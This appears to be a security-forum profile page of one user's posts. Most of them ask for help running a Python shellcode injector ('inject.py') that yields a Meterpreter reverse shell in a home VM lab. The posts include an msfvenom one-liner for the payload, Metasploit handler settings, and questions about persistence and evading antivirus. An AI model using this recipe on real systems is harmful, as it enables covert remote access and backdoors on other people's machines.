wolfdale
-
Posts
36 -
Joined
-
Last visited
-
Days Won
1
Everything posted by wolfdale
-
I doubt it's a problem with the shellcode but i'll give it a try now. If i can't solve messing around i'll wait for your update :P I'll let you know if i find out something. Thanks again, i owe you one!
-
Woot that was quick, thanks. I'm still trying to figure out why x64 payload doesn't work on windows 7 x64 though. I generated the payload as per your instructions and copied it into code1 variable. Still no shell. The payload is twice as long as a 32 bit payload, maybe there is a problem with memory allocation?
-
Yup, but its not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P Thanks for your patience :PP
-
Allright, thanks alot!! I have one more question: Is there a way to make the inject.py code persistent? At the moment the SCHTASKS just starts a python window but doesn't execute inject.py. The cause probably is this line -> exe_loc = str(sys.executable) which points to python executable (python.exe) at the moment. I'm guessing that when the inject.py is compiled to an .exe this method would return the path to the .exe (which makes more sense :P). Since i'm using it in a non-conventional way (as a .py) this doesn't work. I modified it this way -> exe_loc = str("C:\Users\myusername\Desktop\inject.py") Is there a way to copy the inject.py somewhere (i'm thinking documents folder or smth) so that even if someone deletes the .py and reboots I don't loose the shell? Again thanks for your help, much appreciated :)
-
Sorry, it was kinda late (3 AM here), and went to bed :P The steps i did for now are: data=$(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")' Generated the payload for my ip. Copied it into the inject.py replacing code1 variable. Installed python 2.7.5 onto the windows victim machine. Started listener on attacker machine Launched inject.py from the victim machine But i get no shell on the listener... I'm using windows 7 64 bit on the victim machine and kali linux fresh install as attacker machine. EDIT: found the problem. The payload works only on windows 7 32 bit, not 64 bit :/ Any clue?
-
Weird..i generated the payload changing Ip address and port to my likings, both VM are on the same (bridged to my network) lan , copied the payload to the inject.py, launched it, and nothing, metasploit shows no sessions :/ I even tried compiling with py2exe ( oh by the way the resulting .exe doesn't have the .ico embedded into it after the process, minor problem).
-
Uhm is there a way to make it work as a simple python file? Without compiling it to an .exe file with py2exe? I tried executing the inject.py but it kills explorer.exe almost instantly : /
-
Hi, i just received my mark V. I tried to set the password via the web interface. The password has % and $ characters in it. When the pineapple restarts and i try to log in with the password i set, it won't let me in. I later tried (after resetting the pineapple to defaults) to use a normal password without special characters. It works. Does the pineapple have problems with special characters or is my keyboard layout a problem? (Not US) Thanks in advance :P
-
Damn i'm so impressed that inject.exe is so deadly! I've ran it and it got detected by AVG but only after it was in memory, so the antivirus couldn't really do anything. Btw in the metasploit listener you are missing the command "use exploit/multi/handler" . I would also add this command "set InitialAutoRunScript migrate -f" because explorer.exe wasn't stable enought and the sessions would die after few seconds (in my VM at least). Thanks for your wonderful tool !
-
Hi, can you post the source code for the inject.exe? Another noob question, how to change signature of the .exe file if it gets detected in the future? Thanks again for your release :)
-
I ordered my Mark V and a travel kit the day after it was avaliable. It got shipped today, also not showing the travel kit in the confirmation email! Hope its just an error in the confirmation system. Item # Description Qty usb-powered-hub USB Powered Hub - USB Powered Hub 1 wifi-pineapple-standard WiFi Pineapple Mark V Standard - WiFi Pineapple Mark IV Standard 1
